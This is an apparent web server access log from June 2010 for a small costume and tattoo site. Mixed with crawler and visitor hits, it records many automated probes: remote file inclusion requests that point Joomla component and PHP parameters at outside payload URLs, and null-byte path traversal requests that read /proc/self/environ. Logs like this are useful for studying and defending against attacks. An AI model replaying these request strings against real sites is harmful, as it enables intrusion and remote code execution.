118.129.167.25 - - [07/Jun/2010:08:22:21 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
118.129.167.25 - - [07/Jun/2010:08:22:47 -0500] "GET /logs/access_log.1274832000%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
118.129.167.25 - - [07/Jun/2010:08:22:53 -0500] "GET /logs/access_log.1273363200%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
118.129.167.25 - - [07/Jun/2010:08:22:53 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
118.129.167.25 - - [07/Jun/2010:08:22:53 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
188.72.70.56 - - [07/Jun/2010:08:22:59 -0500] "GET /logs/!ijo../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 355 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:08:22:59 -0500] "GET /!ijo../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 350 "-""libwww-perl/5.834"
118.129.167.25 - - [07/Jun/2010:08:23:14 -0500] "GET /logs/access_log.1274832000%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
118.129.167.25 - - [07/Jun/2010:08:24:23 -0500] "GET /logs/access_log.1271548800//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
118.129.167.25 - - [07/Jun/2010:08:24:23 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
118.129.167.25 - - [07/Jun/2010:08:24:23 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
118.129.167.25 - - [07/Jun/2010:08:24:29 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
118.129.167.25 - - [07/Jun/2010:08:24:29 -0500] "GET /logs/access_log.1271548800//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
118.129.167.25 - - [07/Jun/2010:08:24:29 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
69.175.14.66 - - [07/Jun/2010:08:26:27 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.alfarrabio.org//nucleus/xmlrpc/fx29id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
69.175.14.66 - - [07/Jun/2010:08:26:27 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.alfarrabio.org//nucleus/xmlrpc/fx29id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
69.175.14.66 - - [07/Jun/2010:08:26:27 -0500] "GET /logs/access_log.1274227200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.alfarrabio.org//nucleus/xmlrpc/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
207.57.250.92 - - [07/Jun/2010:08:27:53 -0500] "GET //component/?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
207.57.250.92 - - [07/Jun/2010:08:27:53 -0500] "GET //component/?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
207.46.195.237 - - [07/Jun/2010:08:29:06 -0500] "GET /logs/access_log.1226188800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
201.36.173.93 - - [07/Jun/2010:08:29:44 -0500] "GET /logs/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
201.36.173.93 - - [07/Jun/2010:08:29:44 -0500] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
207.57.250.92 - - [07/Jun/2010:08:29:47 -0500] "GET //index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
201.36.173.93 - - [07/Jun/2010:08:29:47 -0500] "GET /logs/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
201.36.173.93 - - [07/Jun/2010:08:29:48 -0500] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
207.57.250.92 - - [07/Jun/2010:08:30:09 -0500] "GET //component/?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
67.195.112.180 - - [07/Jun/2010:08:30:34 -0500] "GET /costume/thmb5.htm HTTP/1.0" 200 3414 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.57.250.92 - - [07/Jun/2010:08:31:12 -0500] "GET //index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
217.16.18.219 - - [07/Jun/2010:08:32:03 -0500] "GET /logs/access_log.1274832000/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
217.16.18.219 - - [07/Jun/2010:08:32:03 -0500] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
217.16.18.219 - - [07/Jun/2010:08:32:03 -0500] "GET /logs/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
79.170.45.162 - - [07/Jun/2010:08:32:38 -0500] "GET /logs//?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8571 "-""libwww-perl/5.836"
79.170.45.162 - - [07/Jun/2010:08:32:39 -0500] "GET //?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.836"
110.137.181.44 - - [07/Jun/2010:08:33:00 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://id.wikipedia.org/wiki/Kostum""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
110.137.181.44 - - [07/Jun/2010:08:33:01 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
110.137.181.44 - - [07/Jun/2010:08:33:04 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
207.57.250.92 - - [07/Jun/2010:08:34:19 -0500] "GET /logs/access_log.1274832000//component/?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
207.57.250.92 - - [07/Jun/2010:08:34:19 -0500] "GET /logs/access_log.1274832000//component/?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
207.57.250.92 - - [07/Jun/2010:08:34:19 -0500] "GET //component/?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
207.57.250.92 - - [07/Jun/2010:08:34:19 -0500] "GET //component/?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
207.57.250.92 - - [07/Jun/2010:08:34:20 -0500] "GET /logs//component/?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
207.57.250.92 - - [07/Jun/2010:08:34:20 -0500] "GET /logs//component/?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
208.75.212.177 - - [07/Jun/2010:08:35:27 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
78.46.12.193 - - [07/Jun/2010:08:35:35 -0500] "GET / HTTP/1.1" 200 1003 "http://www.google.com""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SIMBAR={704C395E-80CC-45AA-9851-C0AEAC1ED6D7}; GTB6; yie8)"
78.46.12.193 - - [07/Jun/2010:08:35:36 -0500] "GET /twiki/bin/view/ HTTP/1.1" 404 299 "http://www.google.com""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SIMBAR={704C395E-80CC-45AA-9851-C0AEAC1ED6D7}; GTB6; yie8)"
78.46.12.193 - - [07/Jun/2010:08:35:36 -0500] "GET /twiki/bin/view/ HTTP/1.1" 404 299 "http://www.google.com""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SIMBAR={704C395E-80CC-45AA-9851-C0AEAC1ED6D7}; GTB6; yie8)"
78.46.12.193 - - [07/Jun/2010:08:35:38 -0500] "GET /logs/access_log.1273017600 HTTP/1.1" 200 462567 "http://www.google.com""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SIMBAR={704C395E-80CC-45AA-9851-C0AEAC1ED6D7}; GTB6; yie8)"
77.222.56.62 - - [07/Jun/2010:08:36:26 -0500] "GET //bbs.lib.inc.php?site_path=http://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
77.222.56.62 - - [07/Jun/2010:08:36:27 -0500] "GET /logs//bbs.lib.inc.php?site_path=http://anfufu.interfree.it/id.jpg?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
207.57.250.92 - - [07/Jun/2010:08:36:33 -0500] "GET /logs/access_log.1274832000//index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
207.57.250.92 - - [07/Jun/2010:08:36:33 -0500] "GET //index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
207.57.250.92 - - [07/Jun/2010:08:36:33 -0500] "GET /logs//index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
217.16.18.219 - - [07/Jun/2010:08:37:44 -0500] "GET /logs/access_log.1274832000/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
217.16.18.219 - - [07/Jun/2010:08:37:44 -0500] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
217.16.18.219 - - [07/Jun/2010:08:37:44 -0500] "GET /logs/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
217.16.18.219 - - [07/Jun/2010:08:37:51 -0500] "GET /logs/access_log.1274832000/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
217.16.18.219 - - [07/Jun/2010:08:37:52 -0500] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
217.16.18.219 - - [07/Jun/2010:08:37:52 -0500] "GET /logs/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
174.133.201.194 - - [07/Jun/2010:08:39:29 -0500] "GET /logs/?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
174.133.201.194 - - [07/Jun/2010:08:39:30 -0500] "GET /?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
72.18.137.210 - - [07/Jun/2010:08:39:53 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:08:39:53 -0500] "GET /logs/access_log.1271548800//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:08:39:53 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:08:39:55 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:08:39:55 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:08:39:55 -0500] "GET /logs/access_log.1271548800//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
118.129.167.25 - - [07/Jun/2010:08:40:43 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
118.129.167.25 - - [07/Jun/2010:08:40:43 -0500] "GET /logs/access_log.1271289600//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
118.129.167.25 - - [07/Jun/2010:08:40:43 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
118.129.167.25 - - [07/Jun/2010:08:40:44 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
118.129.167.25 - - [07/Jun/2010:08:40:44 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
118.129.167.25 - - [07/Jun/2010:08:40:44 -0500] "GET /logs/access_log.1271289600//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
174.121.77.90 - - [07/Jun/2010:08:42:25 -0500] "GET /logs/!ijo../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 355 "-""libwww-perl/5.810"
174.121.77.90 - - [07/Jun/2010:08:42:25 -0500] "GET /!ijo../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 350 "-""libwww-perl/5.810"
207.57.250.92 - - [07/Jun/2010:08:42:31 -0500] "GET /logs/access_log.1274832000//component/?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
207.57.250.92 - - [07/Jun/2010:08:42:32 -0500] "GET //component/?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
207.57.250.92 - - [07/Jun/2010:08:42:32 -0500] "GET /logs//component/?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
202.94.206.97 - - [07/Jun/2010:08:42:33 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://www.google.co.jp/imglanding?q=vintage%20tattoo%20flash&imgurl=http://farm3.static.flickr.com/2137/1800581978_63a5634e81.jpg&imgrefurl=http://www.flickr.com/photos/bonniegrrl/1800581978/&h=375&w=500&sz=169&tbnid=G16NuJvOXUpRYM:&tbnh=98&tbnw=130&prev=/images%3Fq%3Dvintage%2Btattoo%2Bflash&hl=ja&usg=__gMcuF-5tmfXGKt8tKw6l58z9ook=&sa=X&ei=HvcMTLdS3I9wpKXxkQ4&ved=0CCMQ9QEwBA&start=0""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MDDC)"
216.14.126.220 - - [07/Jun/2010:08:43:11 -0500] "GET /logs/access_log.1208995200//index.php?option=com_juser&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.833"
72.18.137.210 - - [07/Jun/2010:08:44:15 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:08:44:15 -0500] "GET /logs/access_log.1271548800//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:08:44:15 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:08:44:26 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:08:44:26 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:08:44:26 -0500] "GET /logs/access_log.1271548800//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:08:45:20 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:08:45:20 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:08:45:20 -0500] "GET /logs/access_log.1273363200%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
79.170.45.162 - - [07/Jun/2010:08:45:43 -0500] "GET /logs/access_log.1274832000//?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.836"
79.170.45.162 - - [07/Jun/2010:08:45:43 -0500] "GET //?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.836"
79.170.45.162 - - [07/Jun/2010:08:45:43 -0500] "GET /logs//?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8571 "-""libwww-perl/5.836"
72.18.137.210 - - [07/Jun/2010:08:45:44 -0500] "GET /logs/access_log.1273017600%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
114.200.199.236 - - [07/Jun/2010:08:45:47 -0500] "GET //atom.php5?page=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
114.200.199.236 - - [07/Jun/2010:08:45:47 -0500] "GET /logs/access_log.1271203200//atom.php5?page=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
114.200.199.236 - - [07/Jun/2010:08:45:48 -0500] "GET /logs//atom.php5?page=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
114.200.199.236 - - [07/Jun/2010:08:45:49 -0500] "GET /logs/access_log.1271203200//atom.php5?page=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
114.200.199.236 - - [07/Jun/2010:08:45:49 -0500] "GET /logs//atom.php5?page=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
114.200.199.236 - - [07/Jun/2010:08:45:49 -0500] "GET //atom.php5?page=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
114.200.199.236 - - [07/Jun/2010:08:45:49 -0500] "GET /logs/access_log.1271376000//atom.php5?page=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
114.200.199.236 - - [07/Jun/2010:08:45:57 -0500] "GET /logs/access_log.1271376000//atom.php5?page=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:08:46:00 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:08:46:00 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:08:46:00 -0500] "GET /logs/access_log.1273363200%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:08:46:10 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:08:46:10 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:08:46:10 -0500] "GET /logs/access_log.1273363200//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:08:46:13 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:08:46:13 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:08:46:13 -0500] "GET /logs/access_log.1273363200//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:08:46:23 -0500] "GET /logs/access_log.1273017600%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
207.57.250.92 - - [07/Jun/2010:08:46:31 -0500] "GET /logs/access_log.1274832000//index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
207.57.250.92 - - [07/Jun/2010:08:46:32 -0500] "GET //index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
207.57.250.92 - - [07/Jun/2010:08:46:32 -0500] "GET /logs//index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
72.18.137.210 - - [07/Jun/2010:08:46:43 -0500] "GET /logs/access_log.1273017600//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
72.18.137.210 - - [07/Jun/2010:08:46:46 -0500] "GET /logs/access_log.1273017600//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.dongriver.com/zboard/data/dongriver_gallery/1.pdf??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
207.46.199.178 - - [07/Jun/2010:08:48:59 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
178.178.57.63 - - [07/Jun/2010:08:50:24 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://images.google.ru/imglanding?q=Bert%20Grimm&imgurl=http://www.shermgrafik.com/blog/wp-content/uploads/2008/11/0929_066f.jpg&imgrefurl=http://www.shermgrafik.com/blog/2008/11/17/frontier-justice/&usg=__4aD5tmEL3Umv156twpok43EFEF8=&h=500&w=366&sz=88&hl=ru&sig2=gIJ-4D9a64RHBa4O1SHQLg&um=1&itbs=1&tbnid=Uz0-PXiFuZetEM:&tbnh=130&tbnw=95&prev=/images%3Fq%3DBert%2BGrimm%26um%3D1%26hl%3Dru%26newwindow%3D1%26sa%3DX%26tbs%3Disch:1&ei=IvkMTM-2C9KJ_gad6PDdDw&um=1&newwindow=1&sa=X&tbs=isch:1&start=0""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
212.227.248.216 - - [07/Jun/2010:08:57:39 -0500] "GET /*.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
